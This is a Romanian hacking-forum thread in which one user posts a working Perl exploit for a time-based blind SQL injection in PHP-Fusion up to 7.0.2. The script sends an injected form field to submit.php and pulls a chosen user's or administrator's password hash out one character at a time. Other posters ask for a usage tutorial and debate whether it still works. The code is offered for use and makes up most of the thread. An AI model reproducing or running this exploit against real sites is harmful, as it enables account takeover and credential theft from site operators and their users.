PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit

[vini4p]

hotel regim hotelier

hotel yahoo domain

Code:

#!/usr/bin/perl -w
# -------------------------------------------------------
# PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit
# by athos - staker[at]hotmail[dot]it
# download on http://php-fusion.co.uk
# -------------------------------------------------------
# Usage:
# perl xpl.pl host/path prefix user_id user_pwd target_id
# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1
# -------------------------------------------------------
# Note: magic_quotes_gpc off 
#       don't add me on msn messenger 
#       my email staker.38@gmail.com
# 
# Greetz: str0ke,The:Paradox,darkjoker,Key and #cancer :D 
# -------------------------------------------------------
# User Password:  my $field = "user_password" ;
# Admin Password: my $field = "user_admin_password";                   
# -------------------------------------------------------

use strict;
use Digest::MD5('md5_hex');
use LWP::UserAgent;


my $field = "user_password";
my ($stop,$start,$hash);


my $domain = shift;
my $ptable = shift;
my $ulogin = shift;
my $plogin = shift;
my $userid = shift or &usage;

my @chars = (48..57, 97..102); 
my $substr = 1; 
my $http = new LWP::UserAgent;



sub send_request
{ 
     my $post = undef;
     my $host = $domain;
     my $param = shift @_ or die $!;
  
     $host  .= "/submit.php?stype=l";

     $http->default_header('Cookie' => "fusion_user=${ulogin}.".md5_hex($plogin));
     $post = $http->post('http://'.$host,[
                                 'link_category'    => 1,
                                 'link_name'        => 1,
                                 'link_url'         => 1,
                                 'link_description' => 1,
                                 'submit_link'      => 'Submit+Link',
                                 'submit_info[pwn]' => $param,
                               ]);
 
}


sub give_char
{
     my $send = undef;
     my ($charz,$uidz) = @_;
  
     $send = "' or (select if((ascii(substring".
             "($field,$uidz,1))=$charz),".
             "benchmark(230000000,char(0)),".
            "0) from ${ptable}_users where user_id=$userid))#";

     return $send;
}


for(1..32) 
{
     foreach my $set(@chars)
     {
          my $start = time();
    
          send_request(give_char($set,$substr));
    
          my $stop = time();
  
         if($stop - $start > 6)
         { 
              syswrite(STDOUT,chr($set));
              $substr++; 
              last;
        }
    }
}

sub usage
{
      print "PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit\n";
      print "by athos - staker[at]hotmail[dot]it\n";
      print "Usage: perl $0 [host/path] [table prefix] [id] [password] [target id]\n";
      print "Usage: perl $0 localhost/php-fusion fusion 5 p4ssw0rd 1\n"; 
      exit; 
}

[Hugo]

Cred ca pt cei interesati (si mai nepriceputi) ar fi mai de ajutor daca ai scrie si catea cuvinte despre ce sa faca cu textul de mai sus! Efortul este apreciat oricum

[fjtr]

# -------------------------------------------------------
# Usage:
# perl xpl.pl host/path prefix user_id user_pwd target_id
# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1
# -------------------------------------------------------

[hi2na]

ceva scris ar fi supper sau mai super un tutorial video pls
:

[luyzette]

vini4p iti cam place sa te lasi rugat?

[BiffBuzz]

milw0rm

[Laur13]

Iit bat la pariu ca nu merge exploitul ...


Ps : este expoloit in perl, active perl ... il downloadezi dp [Doar userii inregistrati pot vedea linkurile. ]

[tromfil]

@Laur13:
1. Logic ca e perl.
2. Are peste jumatate de an, iar de mers, nu merge pe versiunile noi.

[Laur13]

Quote:

Originally Posted by Hugo

Cred ca pt cei interesati (si mai nepriceputi) ar fi mai de ajutor daca ai scrie si catea cuvinte despre ce sa faca cu textul de mai sus! Efortul este apreciat oricum

Eu am raspuns la ce mia zis hugo ...

[Zatarra]

Laur nu sti tu sa`l faci sa mearga aia ii altceva